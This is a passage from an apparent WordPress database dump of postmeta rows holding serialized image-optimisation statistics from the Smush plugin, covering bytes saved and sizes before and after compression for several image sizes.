:10:\"size_after\";i:2635;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:941;s:11:\"size_before\";i:6241;s:10:\"size_after\";i:5300;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:585;s:11:\"size_before\";i:2959;s:10:\"size_after\";i:2374;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1607;s:11:\"size_before\";i:8447;s:10:\"size_after\";i:6840;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2886;s:11:\"size_before\";i:18080;s:10:\"size_after\";i:15194;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4047,2645,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.168719279836526681037867092527449131011962890625;s:5:\"bytes\";i:14730;s:11:\"size_before\";i:144856;s:10:\"size_after\";i:130126;s:4:\"time\";d:0.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:8037;s:10:\"size_after\";i:8037;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1392;s:11:\"size_before\";i:22173;s:10:\"size_after\";i:20781;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:543;s:11:\"size_before\";i:6775;s:10:\"size_after\";i:6232;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3884;s:11:\"size_before\";i:34497;s:10:\"size_after\";i:30613;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:8911;s:11:\"size_before\";i:73374;s:10:\"size_after\";i:64463;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4048,2644,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:21.28937189169275967515204683877527713775634765625;s:5:\"bytes\";i:5779;s:11:\"size_before\";i:27145;s:10:\"size_after\";i:21366;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:434;s:11:\"size_before\";i:2543;s:10:\"size_after\";i:2109;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.10000000000000142108547152020037174224853515625;s:5:\"bytes\";i:958;s:11:\"size_before\";i:4541;s:10:\"size_after\";i:3583;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:580;s:11:\"size_before\";i:2374;s:10:\"size_after\";i:1794;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:1551;s:11:\"size_before\";i:6399;s:10:\"size_after\";i:4848;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:2256;s:11:\"size_before\";i:11288;s:10:\"size_after\";i:9032;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4049,2643,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.22123626096601611834557843394577503204345703125;s:5:\"bytes\";i:5421;s:11:\"size_before\";i:29751;s:10:\"size_after\";i:24330;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:365;s:11:\"size_before\";i:2568;s:10:\"size_after\";i:2203;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:850;s:11:\"size_before\";i:4982;s:10:\"size_after\";i:4132;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:527;s:11:\"size_before\";i:2594;s:10:\"size_after\";i:2067;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1436;s:11:\"size_before\";i:6741;s:10:\"size_after\";i:5305;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2243;s:11:\"size_before\";i:12866;s:10:\"size_after\";i:10623;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4050,2642,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.65808953119492485939190373755991458892822265625;s:5:\"bytes\";i:5577;s:11:\"size_before\";i:28370;s:10:\"size_after\";i:22793;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:389;s:11:\"size_before\";i:2658;s:10:\"size_after\";i:2269;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:904;s:11:\"size_before\";i:4905;s:10:\"size_after\";i:4001;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:574;s:11:\"size_before\";i:2363;s:10:\"size_after\";i:1789;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:1536;s:11:\"size_before\";i:6379;s:10:\"size_after\";i:4843;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2174;s:11:\"size_before\";i:12065;s:10:\"size_after\";i:9891;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4051,2613,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:376336;s:10:\"size_after\";i:376336;s:4:\"time\";d:0.3000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:37718;s:10:\"size_after\";i:37718;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:100721;s:10:\"size_after\";i:100721;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:71107;s:10:\"size_after\";i:71107;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:166790;s:10:\"size_after\";i:166790;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4052,2612,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:252251;s:10:\"size_after\";i:252251;s:4:\"time\";d:0.38000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20439;s:10:\"size_after\";i:20439;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:61118;s:10:\"size_after\";i:61118;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51615;s:10:\"size_after\";i:51615;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:119079;s:10:\"size_after\";i:119079;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4053,2611,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.09395476998555007952518280944786965847015380859375;s:5:\"bytes\";i:3627;s:11:\"size_before\";i:59518;s:10:\"size_after\";i:55891;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:537;s:11:\"size_before\";i:7581;s:10:\"size_after\";i:7044;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:976;s:11:\"size_before\";i:14115;s:10:\"size_after\";i:13139;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:707;s:11:\"size_before\";i:11878;s:10:\"size_after\";i:11171;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1407;s:11:\"size_before\";i:25944;s:10:\"size_after\";i:24537;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4054,2610,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.3704711566975422698533293441869318485260009765625;s:5:\"bytes\";i:3652;s:11:\"size_before\";i:57327;s:10:\"size_after\";i:53675;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:504;s:11:\"size_before\";i:7634;s:10:\"size_after\";i:7130;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.11000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:914;s:11:\"size_before\";i:12855;s:10:\"size_after\";i:11941;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:713;s:11:\"size_before\";i:11648;s:10:\"size_after\";i:10935;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1521;s:11:\"size_before\";i:25190;s:10:\"size_after\";i:23669;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4055,2609,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.05390518337178118457586606382392346858978271484375;s:5:\"bytes\";i:2147;s:11:\"size_before\";i:42482;s:10:\"size_after\";i:40335;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:319;s:11:\"size_before\";i:5966;s:10:\"size_after\";i:5647;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:532;s:11:\"size_before\";i:10302;s:10:\"size_after\";i:9770;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:383;s:11:\"size_before\";i:8346;s:10:\"size_after\";i:7963;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.11000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:913;s:11:\"size_before\";i:17868;s:10:\"size_after\";i:16955;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4056,2604,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.6494193126800720250457743532024323940277099609375;s:5:\"bytes\";i:2912;s:11:\"size_before\";i:33667;s:10:\"size_after\";i:30755;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:362;s:11:\"size_before\";i:4131;s:10:\"size_after\";i:3769;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:875;s:11:\"size_before\";i:9565;s:10:\"size_after\";i:8690;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:465;s:11:\"size_before\";i:5842;s:10:\"size_after\";i:5377;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1210;s:11:\"size_before\";i:14129;s:10:\"size_after\";i:12919;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4057,2603,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:232528;s:10:\"size_after\";i:232528;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:32888;s:10:\"size_after\";i:32888;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:68898;s:10:\"size_after\";i:68898;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:43696;s:10:\"size_after\";i:43696;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:87046;s:10:\"size_after\";i:87046;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4058,2601,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.3719829079570384777753133676014840602874755859375;s:5:\"bytes\";i:2207;s:11:\"size_before\";i:34636;s:10:\"size_after\";i:32429;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:284;s:11:\"size_before\";i:4892;s:10:\"size_after\";i:4608;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:671;s:11:\"size_before\";i:9815;s:10:\"size_after\";i:9144;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:413;s:11:\"size_before\";i:6565;s:10:\"size_after\";i:6152;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:839;s:11:\"size_before\";i:13364;s:10:\"size_after\";i:12525;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4059,2597,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.81982779546785167212874512188136577606201171875;s:5:\"bytes\";i:58323;s:11:\"size_before\";i:280132;s:10:\"size_after\";i:221809;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1495;s:11:\"size_before\";i:30351;s:10:\"size_after\";i:28856;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4335;s:11:\"size_before\";i:95576;s:10:\"size_after\";i:91241;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.609999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:1889;s:11:\"size_before\";i:52259;s:10:\"size_after\";i:50370;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:49.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:50604;s:11:\"size_before\";i:101946;s:10:\"size_after\";i:51342;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4060,2596,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.68834995961668621333728879108093678951263427734375;s:5:\"bytes\";i:3064;s:11:\"size_before\";i:45811;s:10:\"size_after\";i:42747;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:403;s:11:\"size_before\";i:6247;s:10:\"size_after\";i:5844;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:821;s:11:\"size_before\";i:11338;s:10:\"size_after\";i:10517;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:553;s:11:\"size_before\";i:8656;s:10:\"size_after\";i:8103;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1287;s:11:\"size_before\";i:19570;s:10:\"size_after\";i:18283;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4061,2595,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:232981;s:10:\"size_after\";i:232981;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:18931;s:10:\"size_after\";i:18931;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57570;s:10:\"size_after\";i:57570;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:47237;s:10:\"size_after\";i:47237;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:109243;s:10:\"size_after\";i:109243;s:4:\"time\";d:0.36999999999999999555910790149937383830547332763671875;}}}'),(4062,2594,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:168200;s:10:\"size_after\";i:168200;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:14893;s:10:\"size_after\";i:14893;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42886;s:10:\"size_after\";i:42886;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33940;s:10:\"size_after\";i:33940;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:76481;s:10:\"size_after\";i:76481;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4063,2593,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.79507235041063761826762856799177825450897216796875;s:5:\"bytes\";i:2780;s:11:\"size_before\";i:40912;s:10:\"size_after\";i:38132;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:390;s:11:\"size_before\";i:5293;s:10:\"size_after\";i:4903;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:709;s:11:\"size_before\";i:9569;s:10:\"size_after\";i:8860;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:495;s:11:\"size_before\";i:8048;s:10:\"size_after\";i:7553;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1186;s:11:\"size_before\";i:18002;s:10:\"size_after\";i:16816;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4064,2577,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.001022494887525482454293523915112018585205078125;s:5:\"bytes\";i:2543;s:11:\"size_before\";i:19560;s:10:\"size_after\";i:17017;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:388;s:11:\"size_before\";i:3081;s:10:\"size_after\";i:2693;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:451;s:11:\"size_before\";i:3616;s:10:\"size_after\";i:3165;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:609;s:11:\"size_before\";i:4762;s:10:\"size_after\";i:4153;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1095;s:11:\"size_before\";i:8101;s:10:\"size_after\";i:7006;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4065,2576,'wp-smpro-smush-data','a:2:{s:5:\"